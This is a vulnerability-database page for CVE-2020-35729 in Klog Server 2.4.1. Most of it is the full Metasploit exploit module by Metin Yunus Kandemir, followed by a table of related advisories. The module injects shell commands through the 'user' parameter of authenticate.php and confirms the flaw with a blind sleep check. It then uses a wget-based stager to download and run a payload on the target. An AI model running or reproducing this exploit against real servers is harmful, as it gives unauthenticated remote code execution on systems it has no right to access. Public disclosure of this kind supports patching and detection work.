Klog Server 2.4.1 Command Injection

🗓️ 26 Jan 2021 00:00:00Reported by Metin Yunus KandemirType

packetstorm🔗 packetstormsecurity.com👁 150 Views

Klog Server Unauthenticated Command Injection Vulnerability in version 2.4.

Reporter	Title	Published	Views	Family All 17
0day.today	Klog Server 2.4.1 Command Injection Exploit	15 Feb 202100:00	–	zdt
Circl	CVE-2020-35729	5 Jan 202100:00	–	circl
CNNVD	KLog Server OS Command Injection Vulnerability	27 Dec 202000:00	–	cnnvd
Check Point Advisories	KLog Server Command Injection (CVE-2020-35729)	6 Jan 202100:00	–	checkpoint_advisories
CVE	CVE-2020-35729	27 Dec 202004:40	–	cve
Cvelist	CVE-2020-35729	27 Dec 202004:40	–	cvelist
GithubExploit	Exploit for OS Command Injection in Klogserver Klog_Server	9 Apr 202107:59	–	githubexploit
Exploit DB	Klog Server 2.4.1 - Unauthenticated Command Injection (Metasploit)	25 Jan 202100:00	–	exploitdb
Metasploit	Klog Server authenticate.php user Unauthenticated Command Injection	13 Feb 202117:42	–	metasploit
Nuclei	Klog Server <=2.41 - Unauthenticated Command Injection	6 Jun 202603:01	–	nuclei

`##  
# This module requires Metasploit: http://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::CmdStager  
  
def initialize(info={})  
super(update_info(info,  
'Name' => 'Klog Server Unauthenticated Command Injection Vulnerability',  
'Description' => %q{  
This module exploits an unauthenticated command injection vulnerability in Klog Server <= 2.4.1.  
"user" parameter is executed via shell_exec() function without input validation.  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[ 'B3KC4T', # Vulnerability discovery  
'Metin Yunus Kandemir', # Metasploit module  
],  
'References' =>  
[  
['CVE', '2020-35729'],  
['URL', 'https://docs.unsafe-inline.com/0day/klog-server-unauthentication-command-injection']  
],  
  
'DefaultOptions' =>  
{  
'HttpClientTimeout' => 2,  
},  
'Platform' => [ 'unix', 'linux' ],  
'Arch' => [ ARCH_X64 ],  
'Targets' => [  
['Klog Server 2.4.1 (x64)', {  
'Platform' => 'linux',  
'Arch' => ARCH_X64,  
}],  
],  
'Privileged' => false,  
'DisclosureDate' => "2021-01-05",  
'DefaultTarget' => 0))  
register_options(  
[  
Opt::RPORT(443),  
OptBool.new('SSL', [true, 'Use SSL', true]),  
OptString.new('TARGETURI', [true, 'The base path of the Klog Server', '/']),  
]  
)  
end  
  
def filter_bad_chars(cmd)  
cmd.gsub!(/chmod \+x/, 'chmod 777')  
cmd.gsub!(/;/, " %0A ")  
cmd.gsub!(/ /, '+')  
cmd.gsub!(/\//, '%2F')  
  
end  
  
def execute_command(cmd, opts = {})  
command_payload = "unsafe+%22%26+#{filter_bad_chars(cmd)}%26%22"  
  
print_status("Sending stager payload...")  
uri = target_uri.path  
res= send_request_cgi({  
'method' => 'POST',  
'uri' => normalize_uri(uri, 'actions', 'authenticate.php'),  
'encode_params' => false,  
'vars_post' => {  
'user' => command_payload,  
'pswd' => "inline"  
}  
})  
if res && res.code == 302  
print_error("The target is not vulnerable!")  
else  
print_good("The target is vulnerable!")  
end  
end  
  
def check  
uri = target_uri.path  
res= send_request_cgi({  
'method' => 'POST',  
'uri' => normalize_uri(uri, 'actions', 'authenticate.php'),  
'encode_params' => false,  
'vars_post' => {  
'user' => "unsafe+%22%26sleep+40%26%22", #checking blind command injection via sleep  
'pswd' => "inline"  
}  
})  
if res && res.code == 302  
return Exploit::CheckCode::Safe  
else  
return Exploit::CheckCode::Vulnerable  
end  
end  
  
def exploit  
print_status("Exploiting...")  
execute_cmdstager(flavor: :wget, delay: 10)  
end  
end  
`

26 Jan 2021 00:00Current

0.1Low risk

Vulners AI Score0.1

EPSS0.89753